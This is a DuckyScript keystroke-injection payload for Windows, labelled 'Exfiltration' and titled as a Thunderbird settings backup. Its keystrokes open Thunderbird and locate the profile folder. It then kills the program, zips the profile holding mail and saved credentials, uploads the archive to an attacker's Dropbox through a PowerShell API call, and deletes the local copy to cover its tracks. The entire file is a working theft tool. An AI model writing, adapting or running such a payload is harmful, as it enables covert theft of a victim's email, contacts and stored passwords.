REM ##############################################################
REM #                                                            #
REM # Title       : Save Your Thunderbird Settings via Dropbox   #
REM # Author      : Aleff                                        #
REM # Version	  : 1.0                                          #
REM # Category	  : Exfiltration                                 #
REM # Target	  : Windows 10/11                                #
REM #                                                            #
REM ##############################################################

REM Required: Set here your Dropbox access TOKEN
DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
DEFINE #ARCHIVE_NAME cache.zip
DEFINE #DROPBOX_FOLDER_PATH /
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload

DELAY 1500
GUI r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
REPEAT 2 UPARROW
DELAY 500
ENTER
DELAY 500
REPEAT 3 UPARROW
DELAY 500
ENTER
DELAY 500

REM Inside the settings
REPEAT 11 TAB
DELAY 500
ENTER
DELAY 500

REM INSIDE THE PROFILE FOLDER
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500
GUI r
STRING powershell
ENTER
DELAY 1500

STRINGLN cd $env:TEMP
DELAY 500
STRINGLN Stop-Process -Name "thunderbird" -Force
DELAY 500
STRING Compress-Archive -LiteralPath 
DELAY 500
CTRL v
DELAY 500
STRINGLN  -DestinationPath ./#ARCHIVE_NAME
DELAY 1000

STRINGLN_BLOCK
    $filePath = "$env:TEMP/#ARCHIVE_NAME"
    $filePath = $filePath -replace "\\", "/"
    $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME"
    $accessToken = "#ACCESS_TOKEN"
    $fileContent = [System.IO.File]::ReadAllBytes($filePath)
    $headers = @{
        "Authorization" = "Bearer $accessToken"
        "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}")
        "Content-Type" = "application/octet-stream"
    }
    Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit
END_STRINGLN